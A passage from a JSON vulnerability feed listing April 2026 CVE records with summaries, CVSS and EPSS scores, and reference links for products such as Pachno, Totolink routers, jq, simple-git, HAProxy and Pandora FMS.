calls.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":5.1,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-stored-cross-site-scripting-via-multiple-parameters","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5980.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40039","summary":"Pachno 1.0.6 contains an open redirection vulnerability that allows attackers to redirect users to arbitrary external websites by manipulating the return_to parameter. Attackers can craft malicious login URLs with unvalidated return_to values to conduct phishing attacks and steal user credentials.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00032,"ranking_epss":0.08977,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-open-redirection-via-return-to-parameter","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5981.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40040","summary":"Pachno 1.0.6 contains an unrestricted file upload vulnerability that allows authenticated users to upload arbitrary file types by bypassing ineffective extension filtering to the /uploadfile endpoint. Attackers can upload executable files .php5 scripts to web-accessible directories and execute them to achieve remote code execution on the server.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00099,"ranking_epss":0.2747,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-unrestricted-file-upload-remote-code-execution","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5982.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40041","summary":"Pachno 1.0.6 contains a cross-site request forgery vulnerability that allows attackers to perform arbitrary actions in authenticated user context by exploiting missing CSRF protections on state-changing endpoints. Attackers can craft malicious requests targeting login, registration, file upload, milestone editing, and administrative functions to force logout, create accounts, modify roles, inject comments, or upload files when authenticated users visit attacker-controlled websites.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00014,"ranking_epss":0.02686,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-cross-site-request-forgery-via-state-changing-endpoints","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5983.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40042","summary":"Pachno 1.0.6 contains an XML external entity injection vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting unsafe XML parsing in the TextParser helper. Attackers can inject malicious XML entities through wiki table syntax and inline tags in issue descriptions, comments, and wiki articles to trigger entity resolution via simplexml_load_string() without LIBXML_NONET restrictions.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00045,"ranking_epss":0.13809,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-wiki-textparser-xml-external-entity-injection","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5984.php"],"published_time":"2026-04-13T19:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29955","summary":"The `/registercrd` endpoint in KubePlus 4.14 in the kubeconfiggenerator component is vulnerable to command injection. The component uses `subprocess.Popen()` with `shell=True` parameter to execute shell commands, and the user-supplied `chartName` parameter is directly concatenated into the command string without any sanitization or validation. An attacker can inject arbitrary shell commands by crafting a malicious `chartName` parameter value.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11645,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/b0b0haha/f011fdd69adc3ae272a4e3b99af90163","https://github.com/b0b0haha/CVE-2026-29955/blob/main/README.md"],"published_time":"2026-04-13T19:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6194","summary":"A weakness has been identified in Totolink A3002MU B20211125.1046. Affected by this vulnerability is the function sub_410188 of the file /boafrm/formWlanSetup of the component HTTP Request Handler. This manipulation of the argument wan-url causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00077,"ranking_epss":0.22868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhuchan770/vulnerability/blob/main/A3002MU/formWlanSetup/ToToLinkA3002MU%20formWlanSetup%20339996b67c9780caafb2d351dfd8a889.md","https://vuldb.com/submit/797452","https://vuldb.com/vuln/357116","https://vuldb.com/vuln/357116/cti","https://www.totolink.net/"],"published_time":"2026-04-13T18:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6195","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument admpass leads to os command injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_198/README.md","https://vuldb.com/submit/797460","https://vuldb.com/vuln/357117","https://vuldb.com/vuln/357117/cti","https://www.totolink.net/"],"published_time":"2026-04-13T18:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6196","summary":"A vulnerability was detected in Tenda F456 1.0.0.5. This affects the function fromexeCommand of the file /goform/exeCommand. Performing a manipulation of the argument cmdinput results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_113/README.md","https://vuldb.com/submit/797467","https://vuldb.com/vuln/357118","https://vuldb.com/vuln/357118/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T18:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6100","summary":"Use-after-free (UAF) was possible in the `lzma.LZMADecompressor`, `bz2.BZ2Decompressor`, and `gzip.GzipFile` when a memory allocation fails with a `MemoryError` and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition.\n\nThe vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a `MemoryError` is raised during decompression. Using the helper functions to one-shot decompress data such as `lzma.decompress()`, `bz2.decompress()`, `gzip.decompress()`, and `zlib.decompress()` are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.","cvss":9.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.1,"epss":0.0005,"ranking_epss":0.15501,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/47128e64f98c3a20271138a98c2922bea2a3ee0e","https://github.com/python/cpython/commit/6a5f79c8d7bbf22b083b240910c7a8781a59437d","https://github.com/python/cpython/commit/8fc66aef6d7b3ae58f43f5c66f9366cc8cbbfcd2","https://github.com/python/cpython/commit/c3cf71c3366fe49acb776a639405c0eea6169c20","https://github.com/python/cpython/commit/e20c6c9667c99ecaab96e1a2b3767082841ffc8b","https://github.com/python/cpython/issues/148395","https://github.com/python/cpython/pull/148396","https://mail.python.org/archives/list/security-announce@python.org/thread/HTWB2Z6KT5QQX4RYEZAFININDHNOSIF3/","http://www.openwall.com/lists/oss-security/2026/04/13/10"],"published_time":"2026-04-13T18:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32316","summary":"jq is a command-line JSON processor. An integer overflow vulnerability exists through version 1.8.1 within the jvp_string_append() and jvp_string_copy_replace_bad functions, where concatenating strings with a combined length exceeding 2^31 bytes causes a 32-bit unsigned integer overflow in the buffer allocation size calculation, resulting in a drastically undersized heap buffer. Subsequent memory copy operations then write the full string data into this undersized buffer, causing a heap buffer overflow classified as CWE-190 (Integer Overflow) leading to CWE-122 (Heap-based Buffer Overflow). Any system evaluating untrusted jq queries is affected, as an attacker can crash the process or potentially achieve further exploitation through heap corruption by crafting queries that produce extremely large strings. The root cause is the absence of string size bounds checking, unlike arrays and objects which already have size limits. The issue has been addressed in commit e47e56d226519635768e6aab2f38f0ab037c09e5.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.11987,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/e47e56d226519635768e6aab2f38f0ab037c09e5","https://github.com/jqlang/jq/security/advisories/GHSA-q3h9-m34w-h76f"],"published_time":"2026-04-13T18:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-28291","summary":"simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git's flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git's option parsing behavior. This issue has been fixed in version 3.32.0.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00095,"ranking_epss":0.26379,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26","https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d","https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0","https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287","https://www.cve.org/CVERecord?id=CVE-2022-25860","https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"],"published_time":"2026-04-13T18:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-3756","summary":"A vulnerability exists in the command handling of the IEC 61850 communication stack included in the product revisions listed as affected in this CVE. An attacker with access to IEC 61850 networks could exploit the vulnera bility by using a specially crafted 61850 packet, forcing the communication interfaces of the PM 877, CI850 and CI868 modules into fault mode or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. \n\n\n\n\nThe System 800xA IEC61850 Connect is not affected. Note: This vulnerability does not impact on the overall availability and functionality of the S+ Operations node, only the 61850 communication function.\n\n   \n\n\n\nThis issue affects AC800M (System 800xA): from 6.0.0x through 6.0.0303.0, from 6.1.0x through 6.1.0031.0, from 6.1.1x through 6.1.1004.0, from 6.1.1x through 6.1.1202.0, from 6.2.0x through 6.2.0006.0; Symphony Plus SD Series: A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005; Symphony Plus MR (Melody Rack): from 3.10 through 3.52; S+ Operations: 2.1, 2.2, 2.3, 3.3.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00023,"ranking_epss":0.06121,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://search.abb.com/library/Download.aspx?DocumentID=7PAA020125&LanguageCode=en&DocumentPartId=&Action=Launch"],"published_time":"2026-04-13T18:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6191","summary":"A vulnerability was determined in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /equipments.php. Executing a manipulation of the argument Name can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/cve_submit/issues/16","https://itsourcecode.com/","https://vuldb.com/submit/797384","https://vuldb.com/vuln/357113","https://vuldb.com/vuln/357113/cti"],"published_time":"2026-04-13T17:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6192","summary":"A vulnerability was identified in uclouvain openjpeg up to 2.5.4. This impacts the function opj_pi_initialise_encode in the library src/lib/openjp2/pi.c. The manipulation leads to integer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. The identifier of the patch is 839936aa33eb8899bbbd80fda02796bb65068951. It is suggested to install a patch to address this issue.","cvss":4.8,"cvss_version":4.0,"cvss_v2":1.7,"cvss_v3":3.3,"cvss_v4":4.8,"epss":0.00013,"ranking_epss":0.02047,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/uclouvain/openjpeg/","https://github.com/uclouvain/openjpeg/commit/839936aa33eb8899bbbd80fda02796bb65068951","https://github.com/uclouvain/openjpeg/issues/1619","https://github.com/uclouvain/openjpeg/pull/1628","https://vuldb.com/submit/797385","https://vuldb.com/vuln/357114","https://vuldb.com/vuln/357114/cti"],"published_time":"2026-04-13T17:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6193","summary":"A security flaw has been discovered in PHPGurukul Daily Expense Tracking System 1.1. Affected is an unknown function of the file /register.php. The manipulation of the argument email results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/f1rstb100d/CVE/issues/47","https://phpgurukul.com/","https://vuldb.com/submit/797433","https://vuldb.com/vuln/357115","https://vuldb.com/vuln/357115/cti"],"published_time":"2026-04-13T17:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6189","summary":"A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. The affected element is an unknown function of the file /ajax.php?action=login. Such manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lingzezzz/lingze/issues/1","https://vuldb.com/submit/797377","https://vuldb.com/vuln/357111","https://vuldb.com/vuln/357111/cti","https://www.sourcecodester.com/"],"published_time":"2026-04-13T17:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6190","summary":"A vulnerability was found in itsourcecode Construction Management System 1.0. The impacted element is an unknown function of the file /employees.php. Performing a manipulation of the argument Name results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/cve_submit/issues/15","https://itsourcecode.com/","https://vuldb.com/submit/797383","https://vuldb.com/vuln/357112","https://vuldb.com/vuln/357112/cti"],"published_time":"2026-04-13T17:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39940","summary":"ChurchCRM is an open-source church management system. Prior to 7.0.0, it was possible in many places across the ChurchCRM application to create a link that, when visited by an authenticated user, would redirect them to any URL chosen by an attacker if they clicked 'Cancel' button on the page. For this write-up the DonatedItemEditor.php will be used as an example, however wherever all instances of 'linkBack' should be assessed. This vulnerability is fixed in 7.0.0.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00038,"ranking_epss":0.11431,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ChurchCRM/CRM/security/advisories/GHSA-5g52-rvjf-6wwf","https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v3hj-33xf-qx47"],"published_time":"2026-04-13T17:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36950","summary":"Sourcecodester Online Thesis Archiving System v1.0 is vulnerable to SQL injection in /otas/projects_per_department.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-thesis-archiving-system/SQL-2.md"],"published_time":"2026-04-13T17:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36952","summary":"Sourcecodester Online Thesis Archiving System v1.0 is vulnerable to SQL injection in the file /otas/admin/curriculum/manage_curriculum.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-thesis-archiving-system/SQL-5.md"],"published_time":"2026-04-13T17:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23891","summary":"Decidim is a participatory democracy framework. In versions below 0.30.5 and 0.31.0.rc1 through 0.31.0, a stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries. This issue has been fixed in versions 0.30.5 and 0.31.1.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00061,"ranking_epss":0.18876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/decidim/decidim/releases/tag/v0.30.5","https://github.com/decidim/decidim/releases/tag/v0.31.1","https://github.com/decidim/decidim/security/advisories/GHSA-fc46-r95f-hq7g"],"published_time":"2026-04-13T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33555","summary":"An issue was discovered in HAProxy before 3.3.6. The HTTP/3 parser does not check that the received body length matches a previously announced content-length when the stream is closed via a frame with an empty payload. This can cause desynchronization issues with the backend server and could be used for request smuggling. The earliest affected version is 2.6.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":9e-05,"ranking_epss":0.00797,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/haproxy/haproxy/commit/05a295441c621089ffa4318daf0dbca2dd756a84","https://www.haproxy.com/documentation/haproxy-aloha/changelog/","https://www.haproxy.org","https://www.mail-archive.com/haproxy@formilux.org/msg46752.html"],"published_time":"2026-04-13T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36948","summary":"Sourcecodester Online Thesis Archiving System v1.0 is vulnerale to SQL injection in the file /otas/view_archive.php.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-thesis-archiving-system/SQL-1.md"],"published_time":"2026-04-13T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6187","summary":"A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. This issue affects some unknown processing of the file /ajax.php?action=chk_prod_availability. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lingzezzz/lingze/issues/3","https://vuldb.com/submit/797375","https://vuldb.com/vuln/357109","https://vuldb.com/vuln/357109/cti","https://www.sourcecodester.com/"],"published_time":"2026-04-13T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6188","summary":"A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Impacted is an unknown function of the file /ajax.php?action=delete_sales. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lingzezzz/lingze/issues/2","https://vuldb.com/submit/797376","https://vuldb.com/vuln/357110","https://vuldb.com/vuln/357110/cti","https://www.sourcecodester.com/"],"published_time":"2026-04-13T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6231","summary":"The bson_validate function may return early on specific inputs and incorrectly report success. This behavior could result in skipping validation for BSON data, allowing malformed or invalid UTF-8 sequences to bypass validation and be processed incorrectly. The issue may affect applications that rely on these functions to validate untrusted BSON data before further processing. This issue affects MongoDB C Driver versions prior to 1.30.5, MongoDB C Driver version 2.0.0 and MongoDB C Driver version 2.0.1","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00042,"ranking_epss":0.12753,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://jira.mongodb.org/browse/CDRIVER-6017"],"published_time":"2026-04-13T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6184","summary":"A weakness has been identified in code-projects Simple Content Management System 1.0. This affects an unknown part of the file /web/admin/welcome.php. Executing a manipulation of the argument News Title can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks.","cvss":4.8,"cvss_version":4.0,"cvss_v2":3.3,"cvss_v3":2.4,"cvss_v4":4.8,"epss":0.0003,"ranking_epss":0.0845,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Xmyronn/simple-cms-stored-xss-news-title","https://vuldb.com/submit/797265","https://vuldb.com/vuln/357107","https://vuldb.com/vuln/357107/cti"],"published_time":"2026-04-13T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6186","summary":"A security vulnerability has been detected in UTT HiPER 1200GW up to 2.5.3-170306. This vulnerability affects the function strcpy of the file /goform/formNatStaticMap. The manipulation of the argument NatBind leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00041,"ranking_epss":0.12348,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/lin-3-start/lin-cve/blob/main/Amao/1.md","https://vuldb.com/submit/797304","https://vuldb.com/vuln/357108","https://vuldb.com/vuln/357108/cti"],"published_time":"2026-04-13T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36938","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in /orms/admin/rooms/view_room.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-3.md"],"published_time":"2026-04-13T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36937","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in /orms/admin/reservations/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-1.md"],"published_time":"2026-04-13T16:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34186","summary":"Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via custom fields. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0003,"ranking_epss":0.08432,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34188","summary":"Improper Neutralization of Special Elements used in an OS Command vulnerability allows OS Command Injection via Event Response execution. This issue affects Pandora FMS: from 777 through 800","cvss":7.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.5,"epss":0.00359,"ranking_epss":0.58127,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30812","summary":"Improper Neutralization of Input During Web Page Generation vulnerability allows Stored Cross-Site Scripting via event comments. This issue affects Pandora FMS: from 777 through 800","cvss":2.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.1,"epss":0.00047,"ranking_epss":0.14223,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30813","summary":"Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via module search. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0003,"ranking_epss":0.08432,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30804","summary":"Unrestricted Upload of File with Dangerous Type vulnerability allows Remote Code Execution via file upload. This issue affects Pandora FMS: from 777 through 800","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.6,"epss":0.00367,"ranking_epss":0.58697,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30806","summary":"Improper Neutralization of Special Elements used in an OS Command vulnerability allows OS Command Injection via Network Report. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0062,"ranking_epss":0.70028,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30809","summary":"Improper Neutralization of Special Elements used in an OS Command vulnerability allows OS Command Injection via WebServerModuleDebug. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.00464,"ranking_epss":0.64317,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30811","summary":"Missing Authorization vulnerability allows Exposure of Sensitive Information via configuration endpoint. This issue affects Pandora FMS: from 777 through 800","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.4,"epss":0.00038,"ranking_epss":0.11431,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-31991","summary":"Rate Limiting for attempting a user login is not being properly enforced, making HCL DevOps Velocity susceptible to brute-force attacks past the unsuccessful login attempt limit.  This vulnerability is fixed in 5.1.7.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.06582,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130138"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-63743","summary":"Cross-Site Scripting vulnerability in the Snipe-IT web-based asset management system v8.3.0 to up and including v8.3.1 allows authenticated attacker with lowest privileges sufficient only to log in, to inject arbitrary JavaScript code via \"Name\" and \"Surname\" fields. The JavaScript code is executed whenever \"Activity Report\" or modified profile is viewed directly by any user with sufficient permissions. Successful exploitation of this issue requires that the profile's \"Display Name\" is not set. The vulnerability is fixed in 